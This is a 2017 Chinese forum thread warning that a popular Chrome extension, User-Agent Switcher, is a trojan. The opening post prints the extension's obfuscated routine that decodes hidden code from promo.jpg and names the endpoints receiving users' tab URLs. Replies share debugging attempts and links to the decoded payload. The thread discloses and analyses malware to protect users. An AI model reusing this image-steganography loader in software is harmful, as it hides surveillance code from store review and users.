大家注意了 Chrome 的插件 User-Agent Switcher 是个木马
anoymoux · 2017-09-09 06:27:10 +08:00 · 54459 次点击这是一个创建于 2616 天前的主题,其中的信息可能已经有所发展或是发生改变。
chrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...
https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake
为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里
background.js 的第 80 行,从这个图片里解密出恶意代码并执行
t.prototype.Vh = function(t, e) {
if ("" === '../promo.jpg') return "";
void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
var n = this.ET,
i = e.mp || n.mp,
o = e.Tv || n.Tv,
h = e.At || n.At,
a = r.Yb(Math.pow(2, i)),
f = (e.WC || n.WC, e.TY || n.TY),
u = document.createElement("canvas"),
p = u.getContext("2d");
if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
var c = p.getImageData(0, 0, u.width, u.height),
d = c.data,
g = [];
if (c.data.every(function(t) {
return 0 === t
})) return "";
var m, s;
if (1 === o)
for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
var v = "",
w = 0,
y = 0,
l = Math.pow(2, h) - 1;
for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
}
会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data
另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
根据 threatbook 上的信息( https://x.threatbook.cn/domain/api.data-monitor.info ),我估计下面的几个插件都是这个作者的作品..
https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm
https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah
https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg
这里也有人讨论这个问题 https://news.ycombinator.com/item?id=14889619
 |
1
gzlock 2017-09-09 06:33:21 +08:00 via Android  2
真的变 agent 了,赶紧起床删掉
|
 |
2
kmahyyg 2017-09-09 06:37:27 +08:00 via Android
天呐,等我回去看下
|
 |
3
sunbeams001 2017-09-09 07:02:01 +08:00
简直可怕
|
 |
4
Antidictator 2017-09-09 07:24:20 +08:00 via Android
我擦。。
|
 |
5
t123yh 2017-09-09 07:25:34 +08:00 via Android
真 TM 吓人啊
|
 |
6
torbrowserbridge 2017-09-09 07:51:34 +08:00 via Android
我擦,估计早就财务自由了
|
 |
7
whwq2012 2017-09-09 07:59:24 +08:00 via Android
还好我早就不用 ua 切换工具了
|
 |
8
0TSH60F7J2rVkg8t 2017-09-09 08:01:44 +08:00 via iPhone
卧槽,起床去删
|
 |
9
houbaron 2017-09-09 08:09:59 +08:00 via Android
我现在正用着呢。。。有什么替代产品呢?
|
|
10
torbrowserbridge 2017-09-09 08:13:40 +08:00 via Android
奇怪楼主是怎么发现的呢,赞
|
 |
11
wave3c 2017-09-09 08:15:51 +08:00
用了好多年了 惊悚
|
 |
12
mylanch 2017-09-09 08:16:08 +08:00 via iPhone
google 官方会有什么行动
|
 |
13
liyiecho 2017-09-09 08:33:14 +08:00 5
看了下我用的是谷歌提供的 User-Agent Switcher for Chrome
@houbaron #9 https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg |
 |
14
dong3580 2017-09-09 08:39:54 +08:00 via Android
这个用了一次就删了,替换成别的了,害怕,都删了得了。firefox 那个一样名字的呢?
@liyiecho 这个居然是官方的,还好😂没中招, |
 |
15
Cambrian07 2017-09-09 08:45:53 +08:00 1
@liyiecho 删完了发现,我的也是谷歌提供的这个,又默默装上了……
|
 |
16
crystom 2017-09-09 08:51:53 +08:00
我曹,已中招,还好我只是使用的时候才启用这个扩展
|
 |
17
anoymoux OP @dong3580 firefox 也不安全,这家伙写的插件大部分都提供了 firefox,opera 版本的,我列出的这几个仅在 chrome 平台就有超过 100 万用户
|
|
18
anoymoux OP 唉,这个插件我装了几年了,想想这几年都在这个俄罗斯黑客的监控之下,挺恶心的...
|
 |
19
qlbr 2017-09-09 09:23:14 +08:00
|
 |
20
honk 2017-09-09 09:41:44 +08:00 via Android
用 dev tools 自己随便加
|
 |
22
akwIX 2017-09-09 09:47:27 +08:00
|
 |
23
crisfun 2017-09-09 09:54:35 +08:00 via iPhone
晚上来看看
|
 |
24
doubleflower 2017-09-09 10:06:35 +08:00
尽量不要装俄国人写的插件。。。
|
 |
25
infun 2017-09-09 10:09:46 +08:00
@Cambrian07 囧...+1
|
 |
26
lpy6759 2017-09-09 11:35:33 +08:00
删除代码能解决木马吗
|
 |
27
lantianqiren 2017-09-09 11:38:03 +08:00
楼主好人啊····
|
 |
28
deeporist 2017-09-09 11:53:48 +08:00
吃了一惊 还好我 chrome 是用 smart header 自己改的 不过 firefox 里倒是留了一个 刚才一看好像作者就是个毛子立马删之
不过 ff 里的这个我几乎就没用过就是了 改 ua 都是直接用 umatrix |
 |
30
qa2080639 2017-09-09 12:08:34 +08:00
赶紧删了...
|
 |
31
zro 2017-09-09 12:10:47 +08:00
还好 Chrome 这几个插件都没装过
@deeporist #28 FF 我用的是这个 https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/,应该没事的吧。。。好可怕  |
 |
32
zhuziyi 2017-09-09 12:13:53 +08:00 via iPhone
卧槽,先卸载为敬,快来人进一步核实。
|
 |
34
paradoxs 2017-09-09 12:21:09 +08:00
浏览器扩展的权限简直不要太大, 还能自动更新, 除了超级重要的扩展, 别的能不开就不开.
|
 |
35
ihciah 2017-09-09 12:40:27 +08:00 via iPhone
好多插件都被买了然后插后门代码。以前中过一个好像叫 Web timer 发现总是跳转返利链接,查了下源码惊了。。
|
 |
36
shiloh77 2017-09-09 12:43:17 +08:00
Firefox 上這位作者是用什麼名字呢?
有點害怕自己也裝到他的插件... 感謝 lz |
 |
38
jfdnet 2017-09-09 12:47:29 +08:00
记得这个之前有专门文章发过 有好几个有名的插件 是被出售了之后改造了
|
 |
39
xujinkai 2017-09-09 12:53:16 +08:00
吓得我把平时不用的插件都禁用了
|
 |
40
lechain 2017-09-09 13:19:10 +08:00
一直用的 SwitchyOmega,不会有事吧?
|
 |
41
zuolan 2017-09-09 13:26:15 +08:00
可怕,感谢曝光。
|
 |
42
hjdtl 2017-09-09 13:33:07 +08:00
已经和 chrome 联系了
|
 |
43
salary123 2017-09-09 13:49:53 +08:00 via Android
这么久才有人发现。幸亏不是在常用浏览器上使用
|
 |
44
saran 2017-09-09 13:56:25 +08:00 via Android
还好宝宝不用代理(๑°3°๑)
|
 |
46
iyangfei 2017-09-09 14:20:52 +08:00
还好没有用这个
|
 |
47
UnisandK 2017-09-09 14:22:12 +08:00
卧槽惊了
|
 |
49
Clooody 2017-09-09 14:52:20 +08:00
要是真的,去 google 商店那里举报一下也好啊,免得后来人遭殃.
|
 |
50
showgood163 2017-09-09 14:54:22 +08:00 via Android
感谢楼主提醒。目前没在用这些扩展。?
|
|
51
doubleflower 2017-09-09 14:58:15 +08:00
电脑上的 npm 包成千上万,只要其中有一个人想干点坏事或是 npm 帐号被盗。。。那破坏力比插件强不止一点啊。
|
 |
52
7654 2017-09-09 15:17:13 +08:00
哈哈我用火狐,托管在 github 的 User Agent Overrider 扩展
|
 |
53
mjar 2017-09-09 15:29:46 +08:00
没装,但是我想看看那张图片长什么样...
|
|
54
mjar 2017-09-09 15:37:00 +08:00
 ) |
 |
55
usedname 2017-09-09 15:43:34 +08:00
|
 |
56
Izual_Yang 2017-09-09 15:50:20 +08:00 via Android
@deeporist 刚装 umatrix 的时候勾了混淆 ua,然后我上知乎就时好时坏
|
 |
57
hvanke 2017-09-09 15:52:15 +08:00
|
 |
58
hantsy 2017-09-09 15:57:37 +08:00 1
我用的是 Proxy SwitchOmega
|
 |
61
redsonic 2017-09-09 17:29:51 +08:00
LZ 能不能把图片里的 js 直接贴出来
|
 |
62
lslqtz 2017-09-09 18:04:46 +08:00
我的天。。我就在用
|
 |
63
MaxMadcc 2017-09-09 18:05:23 +08:00
我也想知道把图片解密出来后,执行了什么
|
|
64
lslqtz 2017-09-09 18:09:16 +08:00
background.js
80 行,应该可以去掉 |
 |
65
jeffson 2017-09-09 18:11:56 +08:00
可怕
|
|
66
lslqtz 2017-09-09 18:25:12 +08:00
改掉了那些地方,然后自己提交个仅链接可查看的给自己看了
|
 |
67
U2FsdGVkX1 2017-09-09 18:36:04 +08:00
一直用 djflhoibgkdhkhhcedjiklpkjnoahfmg
由 Google 提供 |
 |
68
xifangczy 2017-09-09 18:37:25 +08:00
我靠。我就是用的这个... 不过因为他会在右键添加很多菜单还关不掉,平时都是禁止的。
|
 |
69
Tony2ee 2017-09-09 18:50:55 +08:00
额 看到这个 我就把
https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg 给卸载了还顺便投诉 malware... 感觉自己罪过了... |
 |
70
asdwddd 2017-09-09 18:54:56 +08:00
|
 |
71
jliangchan 2017-09-09 19:00:37 +08:00
已经在 chrome 商店举报恶意软件, 扩展插件耍流氓真不好发现, 运营商 / dns/ 插件都可能劫持返利链接, 很难排除发现到底是谁的问题.
|
 |
72
fhefh 2017-09-09 19:29:51 +08:00
看了自己写的插件 才 60 多个人 /(ㄒoㄒ)/~~
|
 |
73
exoticknight 2017-09-09 19:32:48 +08:00
感谢,已卸载
|
 |
74
liaoyaoheng 2017-09-09 19:50:44 +08:00
举报一下,尽自己一份力。
|
 |
75
schema 2017-09-09 20:09:47 +08:00
已举报,谢谢分享~
|
 |
76
172055 2017-09-09 20:37:21 +08:00
去年就有了...
|
 |
77
yukiww233 2017-09-09 20:43:49 +08:00
吓死我了,结果发现自己用的是 google 的那个,赶紧举报
|
 |
78
skadi 2017-09-09 20:51:49 +08:00 via Android
没用过。。。
|
 |
80
drwx 2017-09-09 21:05:33 +08:00
我用的 Header Hacker,和谷歌官方的那个插件同一作者,不过没有谷歌官方内置的 UA 列表,要自己添加,但是界面上来说似乎好用一点(?)。
|
 |
81
tbag781623489 2017-09-09 21:53:35 +08:00 via iPhone
感谢一下,怪不得经常 pop up 一些鬼佬推广。以后只能油猴或者自己写了
|
 |
83
achendian2 2017-09-09 22:10:06 +08:00
恐怖 删
|
 |
84
LuoboTixS 2017-09-09 23:14:46 +08:00
Chrome 商店里的排名头部免费热门插件,若常年不断更新、功能已经成熟定型的话,都应该考虑是否有偷数据甚至改页面内容(广告跳转)的后门风险,不然 Dev 喝西北风啊?
英文互联网还有很多靠万能关键词 SEO 引诱点击下载的伪工具软件(广告木马)能把浏览器抽插的七窍流血,但根本不报毒也难定位 |
 |
85
kappa 2017-09-09 23:20:59 +08:00
|
 |
86
xcc880 2017-09-09 23:28:42 +08:00
0.0 装了好久
|
 |
87
acess 2017-09-10 00:19:19 +08:00
|
 |
88
Kingfree 2017-09-10 00:39:10 +08:00
这家伙有问题怎么没被举报掉?
|
 |
89
xspoco 2017-09-10 00:50:04 +08:00
我竟然装了。。赶紧删了。。
|
|
90
redsonic 2017-09-10 01:20:25 +08:00
折腾了一下,没发现任何数据泄漏给那个域名。
t.prototype.Vh 这个调用过程中没有参数,导致 if (u.style.display = "none", u.width || t.width, u.height || t.height, 0 === u.width || 0 === u.height) return ""; 直接 return,也就没法知道 hack 的代码藏在图片的哪个位置 就算注释掉掉这句,由于 canvas 没有绘图,所以 d 里面是全 0 var c = p.getImageData(0, 0, u.width, u.height), d = c.data, g = []; if (c.data.every(function(t) { return 0 === t })) return ""; 最后也是 return,到不了后面的解码。LZ 应该分享一下怎么知道里面藏着什么东西的。我不是替这个插件说话,只是想知道实际的受害程度,load 一个图片然后跑了一大段混淆的代码确实没安什么好心。 |
 |
91
15015613 2017-09-10 08:19:40 +08:00 2
@zro
@shiloh77 FireFox 上 User Agent Switcher ( https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/),应该问题不大。 这个是开源的,源代码在这 https://github.com/chrispederick/user-agent-switcher/ |
 |
92
lingaoyi 2017-09-10 09:24:05 +08:00 via iPhone
好恐怖....
|
 |
94
cyg07 2017-09-10 11:00:56 +08:00
|
 |
95
xi_lin 2017-09-10 11:22:55 +08:00
中奖了
|
|
96
redsonic 2017-09-10 11:46:21 +08:00
@cyg07 https://cert.360.cn/warning/detail?id=866e27f5a3dd221b506a9bb99e817889
然而还是不清不楚,没有文件 hash,没有署名,没有提图片里藏什么了以及藏哪了。我实际验证了这个插件,80 行确实加载了 promo.jpg ,但后面马上就返回了。可能实际危害要小很多。 |
|
97
anoymoux OP 1
@redsonic 费了那么大劲把代码藏在图片里,怎么可能执行一下就返回了...你把那一行提取出来 debug 跟踪一下就明白了,下面两段代码是解密出来的
https://pastebin.com/ZYd82Hkm https://pastebin.com/gXV094wm 虽然混淆了,但是还是很容易看出木马行为的...这作者还是挺狡猾的,刚安装之后不会触发监控模块,24 小时之后才会. 另外 chrome 的 F12 network 里看不到插件发送的请求,这也是很多恶意插件能够存在这么长时间原因...如果想看某一个插件发送的请求,在 chrome://extensions/点击插件->背景页,选择 network 就能看到了 |
|
98
redsonic 2017-09-10 17:36:09 +08:00
@anoymoux
d=c.data,g=[];console.log(d) 打印出来是全 0 然会就返回了,应该是这个图片显示出来的时候才解密代码,我抓了两天的包都没抓到,chrome 59 源代码 hook 了 url request 也没看到有相关域名,是有什么触发条件吗? 你是随便开一个 tab 就能抓到? |
|
99
redsonic 2017-09-10 19:22:09 +08:00
@anoymoux 谢谢,直接在 extensions 里面就地调试 可以解出代码了,只不过第一次 getImageData 还是全 0,要第二次才行 。 把那段单独抽出来不管怎么调试都是 return。不过解出来的混淆代码还是没发出任何东西,在里面循环了一段就退出了,应该还是需要什么条件。
|
|
100
redsonic 2017-09-10 19:39:59 +08:00
|
Select Language